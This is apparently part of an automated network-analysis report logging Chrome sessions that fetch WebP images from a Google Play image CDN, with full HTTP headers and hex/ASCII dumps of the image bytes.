                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: dd 95 3e 03 c8 8c 37 fb ee 52 68 f6 89 4f 39 f0 16 66 e2 8a c3 e4 d9 fa 8c 4e ed a9 b3 50 a6 95 0a b8 38 d1 b3 44 ce 38 ad a2 5c 1e c7 b0 82 a2 b6 d6 0a 15 fc 73 b3 9e e5 80 f4 12 64 39 5b 2e 4e 74 a7 ea f4 b1 3c a1 c5 2b 39 49 e2 4f 69 00 58 dc 9a e1 90 ad 0c 04 99 a8 01 82 89 14 50 3c 6a 71 e4 80 02 55 70 28 d1 b9 4f 6c 77 a7 f5 36 62 3b 21 5a 31 c1 77 1a b0 82 45 d5 a3 bb 7d a3 2c c9 e9 61 ab 40 7b bf d0 7e b0 a4 e4 31 81 0e c1 80 68 8f e4 69 31 dd 02 b4 56 01 26 84 4d ee 7b 35 f0 65 c1 92 c3 18 90 35 c4 a2 b2 f7 fe c3 4c bf e3 10 20 6a 3b c7 4f d1 58 33 76 49 66 27 24 de 4c 6a 28 8b 0b f0 fc 25 5f 8e 52 4f 4a 34 d2 42 83 b9 7a a1 f8 ba 1a bc 73 6a 7b 8b 3a 68 69 d1 fe 03 67 9d 4d 96 5a 48 59 45 43 c4 43 21 55 2b 59 01 3c 28 47 e2 5d 07 b7 70 5b d0 25
                                                                                                                                                                                                                                  Data Ascii: >7RhO9fNP8D8\sd9[.Nt<+9IOiXP<jqUp(Olw6b;!Z1wE},a@{~1hi1V&M{5e5L j;OX3vIf'$Lj(%_ROJ4Bzsj{:higMZHYECC!U+Y<(G]p[%
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: ba 28 a4 c1 ca 03 c3 e3 f4 af 34 14 4e 76 69 7a f1 ef dc f3 4b da 8e d9 56 72 7c 7c f2 98 11 95 ec a3 f5 c6 b6 43 b3 60 9c 4b 1a 6b 19 e3 55 4e 58 ff 64 ad da 9d 9c 68 2f fc f5 31 57 3d eb 62 13 ce 2f f0 c5 ee 3f 9c 9f e1 ae 7a 0c 4e 17 a8 e0 a0 ba 55 27 11 38 29 4f b8 2a e0 d1 4a dd 9e 28 cb 00 eb 0d 90 ad be a3 9a 65 6d 0d 57 68 38 c3 51 6b 81 d1 db bb 58 31 fb 85 f3 0e 34 1f d6 0f dd 5e e7 d3 67 72 a2 8a 5c 2e 3f 7b 7f 07 29 9a e5 cc 40 7f 28 f6 7e 69 06 e4 8e db 66 ca ec 07 7c 9a 7d a7 26 11 d1 19 c2 9e 78 6b c2 09 27 7c 74 5f e4 7c b1 7b 44 da ae 0a 1a bc 37 48 2e 99 42 8d 3a d5 56 3a e7 02 f5 7f db 4d a9 35 88 f2 0e b7 d2 06 1c d0 e8 e2 d0 62 f9 eb f2 1f 16 c6 52 0e c7 2f 6a 70 4f 4c a9 22 1b 80 a8 7d 37 dd ca 23 4c 61 4e 25 af 68 e1 1e 63 28 f2 78
                                                                                                                                                                                                                                  Data Ascii: (4NvizKVr||C`KkUNXdh/1W=b/?zNU'8)O*J(emWh8QkX14^gr\.?{)@(~if|}&xk'|t_|{D7H.B:V:M5bR/jpOL"}7#LaN%hc(x
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 5a 88 66 56 b8 5b 18 95 2c f0 d7 75 4f 84 5f e4 35 22 ba 19 19 58 05 00 0a 51 a3 a7 a5 5b c2 db 3e de c5 44 87 57 43 10 34 32 ed 3f a4 35 1e af 0a 36 be f0 0b 7b 6e 40 e0 39 63 ad 5a c7 3a 56 bc d4 fa c6 b8 c7 a4 77 da 96 50 6f 2e 5c ef 0d e7 f3 7d 9d 93 e2 c2 36 47 7c 20 6b 80 a1 59 c7 8a 86 37 f7 b2 4b 86 a6 6d 6d cc 92 d0 ce dd 22 e3 99 a2 f2 d0 51 32 dc 68 f9 2c 60 50 67 24 c8 1d 20 82 0b 65 6d 36 87 9c bb 76 ed 57 73 3a 22 6b e4 ec c1 94 ff 78 b7 be 3e 6f aa 62 a7 8f 6e 0c 53 31 0f 9b 3e c8 55 a9 d0 e4 c3 fc 1e ef 93 cd 27 da 00 66 41 aa d6 f0 e1 e8 e9 fe a8 1f 18 b5 c5 8a f1 bc 52 e0 20 93 19 d3 7c 00 a3 1c df a9 82 9f 00 bf 58 06 cf 34 69 32 d7 3a eb b1 5c c6 c1 fe 42 73 87 dd a7 bf 11 2f 5c 0b 83 52 db cd a6 f7 73 32 2b e5 08 37 1c 95 24 8e 58 4d
                                                                                                                                                                                                                                  Data Ascii: ZfV[,uO_5"XQ[>DWC42?56{n@9cZ:VwPo.\}6G| kY7Kmm"Q2h,`Pg$ em6vWs:"kx>obnS1>U'fAR |X4i2:\Bs/\Rs2+7$XM
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 63 00 e0 6e a7 f0 d0 51 32 f8 81 ab 74 07 06 f0 87 d0 58 a0 1c 11 32 59 9e 1c 69 be 03 0e 0a fe 4e bf 65 43 ab 31 d7 9d 42 2e 97 c7 58 11 2d 92 22 de 1b 79 bc 6c 21 96 1f 00 d4 af 29 89 0a 2d 6c 12 5d d2 93 fa 8b f6 dc f5 a7 dd e6 dc f1 1d 1f 7f 5f 73 d0 e9 ab 4f 2f de ab 58 b1 62 bc ef fa 1b 96 73 83 19 76 25 b4 12 ce 01 3e 41 09 1d 11 96 bf b4 69 b7 7a 1b e3 5a e1 45 da 0c 3e 9f 01 88 bd 02 27 29 66 53 2c b6 22 49 ff 90 5a 50 25 67 24 b9 27 cc 30 01 ab c1 52 0d 33 73 c8 08 1d 34 1b 50 d0 e1 91 89 c2 c2 5d 4e 18 66 76 b0 e6 a7 8f 49 49 10 e4 f0 98 30 b9 a2 c5 4a 80 0e 9f bc b2 5f 32 bf 12 27 59 6c d6 f8 76 71 2b 69 96 db 2d ad d6 6e a7 d5 6a ed 65 1f 87 73 67 87 20 cd ee e3 4a 5b 4f c8 b7 00 66 e9 87 15 ac de 8b 14 74 7b 64 2d 76 ab cf 9e 4d ca da e5 7a
                                                                                                                                                                                                                                  Data Ascii: cnQ2tX2YiNeC1B.X-"yl!)-l]_sO/Xbsv%>AizZE>')fS,"IZP%g$'0R3s4P]NfvII0J_2'Ylvq+i-njesg J[Oft{d-vMz
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: ee 51 87 65 9c 39 c3 59 0f 14 a2 3b c2 04 00 27 a7 ae 78 99 a7 f6 a1 29 4f 14 2b 0e aa 55 f8 a4 87 98 51 47 2d 9a 30 44 69 d7 2c e4 44 4f 44 e4 53 b6 6a 5f b7 bf cc 64 7f 48 c3 89 81 56 ab 85 4c b2 a9 65 82 82 57 70 87 be 12 7f 58 f3 40 f5 ae df db 1a 6e 7c 9f d5 ae cb cd c9 ac c0 06 b4 60 fc ac cf 62 84 f0 9c 6c c9 04 99 9e 75 b7 5b f4 82 20 e8 05 04 a6 70 f8 e1 66 be 87 19 c4 72 59 77 b1 62 71 80 5e a3 90 e6 ef 37 0f ac 58 05 a0 4c 7e 20 2b 40 62 97 05 1d c0 61 ae 1c 40 a7 58 5d 58 4b 98 43 0c d2 16 b3 03 34 9e 02 66 05 ae a2 9b 43 03 3a eb 23 9a a1 56 14 dd bd 2f 26 cf 06 4d c8 74 fd 93 3f 09 64 8d a8 37 33 98 78 90 af 89 49 bd 88 a1 21 0a 16 64 56 4a 6e 8e 9f 63 6e e2 9d 90 58 e9 15 4a 8e 53 d6 9d 02 0b d1 d4 54 e1 24 b0 59 f6 86 bb 6b 45 e9 b3 e2 02
                                                                                                                                                                                                                                  Data Ascii: Qe9Y;'x)O+UQG-0Di,DODSj_dHVLeWpX@n|`blu[ pfrYwbq^7XL~ +@ba@X]XKC4fC:#V/&Mt?d73xI!dVJncnXJST$YkE
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: eb f8 62 73 63 c6 4b 1e 8c 0a 44 34 aa 5a 13 75 76 39 2b 2f e0 79 fa b1 82 12 e5 39 e9 68 82 65 70 2e 22 72 1a 08 18 d0 60 30 1b ea da c5 6c e6 e5 b6 1a 5a 8e 15 32 2d d1 7e 41 54 79 0b 4a b0 22 44 df 87 10 a1 a2 db cb d6 b3 8d 3a dd e9 66 eb 70 d1 97 5a c9 00 37 4b 4b 5b 3d f7 58 17 7d 3f 8b 20 9e d0 fa 54 e7 4c 02 58 95 94 7e 51 bf ac 2a c9 5b ef ac 78 27 b6 12 05 24 8b f8 fc 33 b3 a8 ae 50 7a 34 68 fc 3d 51 35 59 9e f1 95 a3 1d ca ea 21 14 42 50 b0 e2 0e 53 fe a4 05 ea 80 55 b1 c5 b6 ba 44 95 a6 1f 8e ef f2 d5 90 77 d3 6c 73 fd 81 a1 01 10 09 2d 0a 16 3b 32 da 09 a8 d8 5b 52 de 26 01 a0 bf 07 3d 7b c1 23 ce 93 13 a7 ae 30 f5 36 2b da 05 95 be e6 e3 a7 41 48 e5 2b a0 cf a1 14 d3 61 be 54 47 30 9b 5e 20 f1 0e ab ab aa 54 95 c6 78 1f 18 fa d1 1e cd 50 b7
                                                                                                                                                                                                                                  Data Ascii: bscKD4Zuv9+/y9hep."r`0lZ2-~ATyJ"D:fpZ7KK[=X}? TLX~Q*[x'$3Pz4h=Q5Y!BPSUDwls-;2[R&={#06+AH+aTG0^ TxP


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  124192.168.2.649974216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1093OUTGET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 9316
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5844
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC857INData Raw: 52 49 46 46 5c 24 00 00 57 45 42 50 56 50 38 20 50 24 00 00 d0 7e 00 9d 01 2a a6 00 28 01 3e 51 22 8e 45 23 a2 21 14 ca 56 34 38 05 04 b2 37 7e 3e 3d 80 0c ac 33 5f e6 7f 92 1d f2 1b 9b bf fe 39 7e ea 7f 99 f9 a4 aa ff 6a fe 89 fa 3b f2 77 e5 27 77 91 9b ec 07 f5 1f 9b 3f e3 fe 5f 7f 6b ff 65 fd 7b dc b7 e6 df f7 bf cc ff 7f fe 81 7f 48 ff d5 7f 60 ff 1b d8 9b cc 07 f4 0f ef 5f f9 3f e1 7b b1 ff a9 ff ad fe 9f dc df f6 7f 50 0f e9 7f e0 7f f5 7b 57 ff b0 f6 1d fd bd f6 00 fe 89 fe 93 ff af b3 af fc 3f db 9f 83 0f eb bf ec bf 70 3e 04 ff 64 7f f7 7b 00 7f e6 f5 00 e9 f7 eb 97 f9 0e d7 7f c1 7f 6a f2 0f c5 8f a9 bd be fe f7 ed 11 99 be c8 75 35 f9 6f da 1f d2 7f 8a fd cb f6 23 fd 6f 84 ff 23 bf bd f5 08 fc 93 f9 77 f8 df ec de 45 ff e1 77 1f 6d 3f eb 3f d2
                                                                                                                                                                                                                                  Data Ascii: RIFF\$WEBPVP8 P$~*(>Q"E#!V487~>=3_9~j;w'w?_ke{H`_?{P{W?p>d{ju5o#o#wEwm??
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 8c cd 70 46 6e 59 27 35 72 83 2a 4c 67 29 7b a3 0e cd 4c df f3 c3 67 1d e0 07 a5 d1 b0 24 b0 5f 17 60 04 0f 98 49 b7 15 be 8b a4 30 90 90 cb ae 49 2f ac 04 ba d3 20 15 ce 15 51 ef 0c a6 a3 8b 84 40 74 1f 4d 2d 73 10 d2 d0 47 40 59 41 49 9f dc 4c 25 66 50 f2 26 29 20 b7 01 6d 85 67 3c dc 21 5e d8 41 32 35 a3 5a 90 8d df 10 42 1f a0 7b 06 2c 94 66 f2 eb 1f db ec 6a 89 71 e9 93 71 f1 fe ac 2c e1 ba 2c 6c 5d 20 1e bc 27 6b e6 6c 84 fe 58 5a b7 ce 5d 2b 43 bc ef c6 dc a9 f4 27 dd f1 96 f6 31 f7 4b ab f6 71 4a a4 65 d4 67 63 6b cc 03 98 66 de 58 2b de 44 c0 00 fd d1 77 f1 cd 82 3a 5d 7f 22 3b 2b 89 b4 d9 b9 9f 00 00 00 00 18 38 27 54 b6 6d a4 b0 87 50 c7 52 1b 37 8f 3c 0e f4 36 8d 75 52 b1 f3 67 e0 73 bc 7b d2 0c 1a c2 c9 0e 72 29 fe 98 43 5d 18 a1 8d 8c 0e 7b
                                                                                                                                                                                                                                  Data Ascii: pFnY'5r*Lg){Lg$_`I0I/ Q@tM-sG@YAIL%fP&) mg<!^A25ZB{,fjqq,,l] 'klXZ]+C'1KqJegckfX+Dw:]";+8'TmPR7<6uRgs{r)C]{
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 2b b0 64 10 4f 61 71 22 f0 f0 ce b8 d0 79 de c6 22 89 54 1c 8a aa eb f0 58 38 80 75 2e a4 26 a7 b3 d1 f8 60 68 e3 92 8a 34 60 61 04 ce e4 fb 04 7e 44 d0 f0 40 d8 cc 03 1c e0 f6 7f ba 4e 94 75 52 fe 55 6c 4e a5 08 34 60 0c c0 fc f8 ce 81 2c 3f 73 58 d0 49 07 c4 37 f5 c0 6f 37 54 47 de 7b af e6 3a a1 69 89 c1 7d 51 a7 42 58 6f 88 7d a7 d1 53 f5 e9 d9 31 b3 b1 a3 7e 37 90 b6 f8 2c 98 d3 65 e1 3a f8 a3 fa bc d4 94 a0 8c be 64 ad 9a e0 8e 92 03 a0 01 b4 65 0a 75 98 d9 60 20 3c 45 f1 18 48 2e 55 08 67 fd 6e 45 16 57 d7 49 a7 bb 30 60 8f 42 c3 cb eb 62 a9 05 02 da 3a 3a 57 fc d1 c7 55 30 8a 1c e3 df 10 27 c9 79 ee b7 bb 7e 4f e4 ff 3f 4c dc 25 8c b7 f6 38 4b 7c 77 d7 13 26 6a f1 4f 06 d6 08 00 ec ff 80 e4 5b 9d a5 d7 9e 07 a0 18 00 fd 00 ae e9 58 9c 8b e7 5b eb
                                                                                                                                                                                                                                  Data Ascii: +dOaq"y"TX8u.&`h4`a~D@NuRUlN4`,?sXI7o7TG{:i}QBXo}S1~7,e:deu` <EH.UgnEWI0`Bb::WU0'y~O?L%8K|w&jO[X[
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 1e 54 f5 1e 88 74 1e 98 01 69 96 f8 0d a9 ee 1f 84 05 5f c6 64 36 6a 74 61 f6 d5 c8 89 89 d5 ec 9c ab 7f 8a d0 91 af 0e bf ea 14 6f 56 c6 11 55 21 04 05 fc 4a 49 7e 87 d4 75 49 8e 50 22 9e 11 52 5b 4b 51 bd 72 72 ce c8 1b ed ec 42 51 e2 dc 99 d8 79 9e 4c 93 3f e1 f8 73 e3 cb 06 87 91 f6 c0 da 58 83 d1 e4 46 40 25 04 ff 9e 75 5f d6 f2 de 9d d1 2a ca fe 6a f6 d2 84 95 ba 83 f7 c0 1f 90 b2 95 3d 4b 91 a5 db c9 3f 6d 60 25 cc 42 36 08 6b 89 6b c5 af d8 bc c5 03 83 0a 3b cc 93 8b 27 b3 44 a3 f7 0b b0 d6 d9 57 7a 41 9e 5b 53 24 82 ab 6c 49 fe 66 a6 74 a7 cc 62 33 bc ad f7 d4 fa d0 07 21 dc 6a b3 1d 4e 94 34 0a 32 2c 17 59 4a bb f5 e8 ec c7 7e bd 0a 4f 95 02 91 a2 54 f5 ce 17 44 6b 73 88 45 df 44 1f f6 47 6a 0d 45 63 fb c7 fc 59 69 72 27 58 5c 50 a6 8d a1 92 9b
                                                                                                                                                                                                                                  Data Ascii: Tti_d6jtaoVU!JI~uIP"R[KQrrBQyL?sXF@%u_*j=K?m`%B6kk;'DWzA[S$lIftb3!jN42,YJ~OTDksEDGjEcYir'X\P
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 53 18 2f 49 6f 18 37 0a d5 9d fb 4c c5 d4 23 17 59 5d 0f 2b a9 10 01 83 a5 97 7e a9 f0 f1 d3 d7 ac df a3 93 22 20 a7 6c bf 5c 92 a6 1e b9 46 1d a0 bc 41 e7 c8 88 b7 26 05 44 ef f7 b1 cf ff 84 dc ad 52 7a d9 80 c2 86 5f 12 6e 5d 4d 59 c1 88 e6 05 6c 78 1b 75 08 f0 4f 67 8e ad d4 be 13 8e 16 b7 49 da 7c bf a3 e7 fa 4f 16 19 44 9b de c1 42 83 01 17 fa 89 72 eb 5b 29 32 ca ec 0a 19 e8 31 75 f8 20 75 8b e0 10 61 7a 02 9d 6d cb ca 77 3e b8 4a 3a 92 3b 73 ac f6 35 34 37 01 96 54 d9 a4 f8 91 21 f1 98 7f 53 27 a1 6e 17 23 ab 2d 15 f1 da 26 27 8c 4e 97 20 01 fe 9b d7 b0 ad d5 a0 2d 55 a5 9b 35 79 7a 54 8e b9 b1 90 cd 3c 40 57 65 f3 99 b3 cf d8 23 12 8d cf cf e6 93 3d db 90 f2 4e 93 18 70 28 1e 68 a4 ba 43 1d e9 bb ad 63 61 64 94 7d c0 9f b1 32 92 c6 42 43 fb 54 97
                                                                                                                                                                                                                                  Data Ascii: S/Io7L#Y]+~" l\FA&DRz_n]MYlxuOgI|ODBr[)21u uazmw>J:;s547T!S'n#-&'N -U5yzT<@We#=Np(hCcad}2BCT
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 47 ab 3c 66 12 b2 ef 65 12 30 2b 47 3c f3 ea 4b 6d 0a f6 50 14 c8 80 a2 aa 10 e3 d2 52 3e 91 e1 6c 75 41 af 48 d0 6b 94 c2 28 fd 68 4b 59 30 76 30 51 5b d3 5b b2 af 1b da 6c 41 46 16 69 86 6e cc ef fd d8 a7 de 02 bf 6d 94 86 47 d9 0a f4 5d 69 fb e3 77 01 d9 65 9c a9 8c 82 8a bc 42 25 6a b3 1f ab c5 58 b5 56 ac b1 ae 0c 26 c4 45 0c 4e 34 f1 85 74 a2 23 cd 5f a0 1c 3d 4a 64 73 8b 81 07 09 96 ce 5e 9a 4d 4f aa a2 2e 44 88 ec d6 bf 1f 81 c1 e0 9a 1d 6e 42 1f 58 66 7c 69 39 57 16 e4 b1 29 18 89 2b 86 6a 96 df 91 af 1c 23 49 63 21 cf 38 6d 84 b7 34 91 7e 02 06 18 c3 d6 1b bd 39 90 df 5b 1a 56 59 cf 15 17 15 c0 d1 9d 7c d8 61 35 fe a1 3d f8 64 ae 98 b7 73 65 34 65 fe 7f e3 17 e4 41 7b 7c bf 7a 53 d1 41 7a 24 3c 46 1e 84 70 e2 15 d3 83 d8 85 4c c0 f1 7e a4 72 58
                                                                                                                                                                                                                                  Data Ascii: G<fe0+G<KmPR>luAHk(hKY0v0Q[[lAFinmG]iweB%jXV&EN4t#_=Jds^MO.DnBXf|i9W)+j#Ic!8m4~9[VY|a5=dse4eA{|zSAz$<FpL~rX
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: af 7d 6a 93 84 b9 2d b2 ce 52 9e 72 3c bf 33 93 4a 82 0c c5 8f 80 71 34 16 2f a1 70 b5 e0 35 52 43 e2 13 7d 31 aa 7e 1c a8 90 01 a6 dc 3d 35 e1 fe 03 eb d7 4a 67 68 19 cd 62 f4 5d a2 42 f6 4e c6 e7 de 2e 53 04 6a e8 4f 5d 6c 6c 8b a4 de ef 5e 0b b5 1b 34 87 c9 3c ea 51 96 30 e8 80 b3 ac f1 83 b8 a7 89 7d 7d cd c7 85 e2 68 20 c3 2b fd 2c 00 42 7b bb 9d 12 6f 1d 67 9b 0a 2c 4c 78 af 47 03 db 7a af fd c3 5b 8b 59 df c6 b2 4c 93 43 bd 8c de d0 df 82 5f 3b 34 04 71 7a 47 55 0f f8 0a 1f 8d 4d 7a 62 28 9a 28 e9 5b 75 e5 6f 28 1d 4e 2f 80 9e fb 4e d8 71 47 e4 9b ae 15 1b cd a7 d4 d0 08 ff ce 86 24 70 5f 2f 27 4a ab 2d 1e 31 41 9b 86 ea cd e2 ed c0 73 15 54 df a0 49 3d 9b a8 5f a5 14 8b 3d 90 af 4f f1 8f 36 54 2a f8 f6 7b a3 eb fe d5 03 89 79 5d f0 a0 b0 e6 d7 b8
                                                                                                                                                                                                                                  Data Ascii: }j-Rr<3Jq4/p5RC}1~=5Jghb]BN.SjO]ll^4<Q0}}h +,B{og,LxGz[YLC_;4qzGUMzb(([uo(N/NqG$p_/'J-1AsTI=_=O6T*{y]
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC119INData Raw: 82 73 02 1b 12 82 f5 28 f4 50 99 9b 7c 66 ca 85 83 97 78 1a 76 a0 61 9b 4a 71 80 9c 3f 24 f5 24 bd 49 dd c7 cd 5c 37 e3 82 67 d1 b3 12 e6 c9 c7 15 18 7c af 38 e5 91 f7 a2 a5 0a 6e 91 0f b0 3d 52 47 b7 d1 e3 56 5f 80 fe e9 60 24 8b 42 ad 0b 3d 71 04 2f 24 72 d5 83 4f 5b 09 c2 8b 10 2e 97 76 4c 2c d6 c2 55 e0 f6 32 2e 66 8b c9 f0 26 8e ca fd c3 56 00 00 00
                                                                                                                                                                                                                                  Data Ascii: s(P|fxvaJq?$$I\7g|8n=RGV_`$B=q/$rO[.vL,U2.f&V


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  125192.168.2.649978142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC510OUTGET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 60476
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 6674
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC856INData Raw: 52 49 46 46 34 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 08 00 00 00 9f 01 00 ca 00 00 56 50 38 4c eb eb 00 00 2f 9f 81 32 00 4d d0 92 6c db 6e db 60 2d 80 86 ec 75 30 ff 01 df 4b fa 99 7c 47 f4 7f 02 f8 df 7e fe 09 b6 c5 71 2e 9c e4 aa 3a ff 84 2c 2e d5 e1 32 f5 cf f0 a2 45 fa 43 ae a2 6f f0 8d 13 38 89 7e cf ff d3 eb 82 f3 83 eb 8b f3 93 0b ce 0f ae 2f 38 97 83 43 e6 d8 cd c1 21 9e 1c 10 81 cc b1 9b 83 43 e6 20 a8 64 aa 05 50 94 58 4b 94 16 30 19 0b 98 c4 dd 40 a9 33 41 bb 91 01 82 96 8a 40 d1 29 60 60 bc 6d 08 06 76 54 0d 8c 28 50 6e d2 d1 2c d5 25 e1 d6 8d 36 d4 62 06 89 75 9b 97 fb 66 aa 09 96 fb d1 ac 37 7c f2 7e 53 4f c5 8e 29 08 97 a0 d9 99 76 53 e4 7a 3f d4 eb 75 2f e9 cb 33 66 f1 cc 0f 72 ee bb 5a ee d7 2d 7d 3d f7 32 c5 77 ce 5e b8 a4 ed 86
                                                                                                                                                                                                                                  Data Ascii: RIFF4WEBPVP8XVP8L/2Mln`-u0K|G~q.:,.2ECo8~/8C!C dPXK0@3A@)``mvT(Pn,%6buf7|~SO)vSz?u/3frZ-}=2w^
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 04 bd 0b da d1 3b 3c 3c 00 f9 7c e9 fc 99 9f e7 a8 71 87 c3 c2 5c d3 83 9b 5b 94 97 84 2a 42 b8 23 cf be 0c cb 96 c2 2f 0f 23 c7 f9 c1 6d 7d 6e 54 b3 91 67 fd 20 e3 a1 88 27 20 df d2 19 97 72 5a 92 69 cd c6 90 19 8a 55 82 67 45 1b 58 7a 4a 0a 5b 3c 13 74 35 73 82 07 6a e0 ea e7 7f 39 80 7c d5 a9 c8 53 6c 9e 97 b4 38 ef 37 c3 df e3 dd c6 7d 77 ba 8d 5d 76 00 12 11 fb 0f 1d 16 f6 cb 7e 91 c5 56 4d cb b0 25 f3 61 30 95 f9 71 b7 00 90 87 30 4f 85 73 66 cd 57 b9 4b b6 76 58 d1 ce 9b 47 26 00 5a e0 3e e6 46 5e 31 05 7a 42 00 00 20 bf f9 a1 30 ad 6c 53 db 04 99 f7 72 ce 39 2f 2d e3 06 15 00 f9 50 57 a3 52 d5 eb 8e 8a 6c 27 55 50 4f d5 ef bf 99 0f 73 00 a0 dc 48 d5 f4 1f 10 e8 f2 cd 61 00 b4 d1 74 35 d6 06 80 fc 46 90 73 99 4b 92 b5 5a 61 9f af 81 a8 e4 3b 20 6e
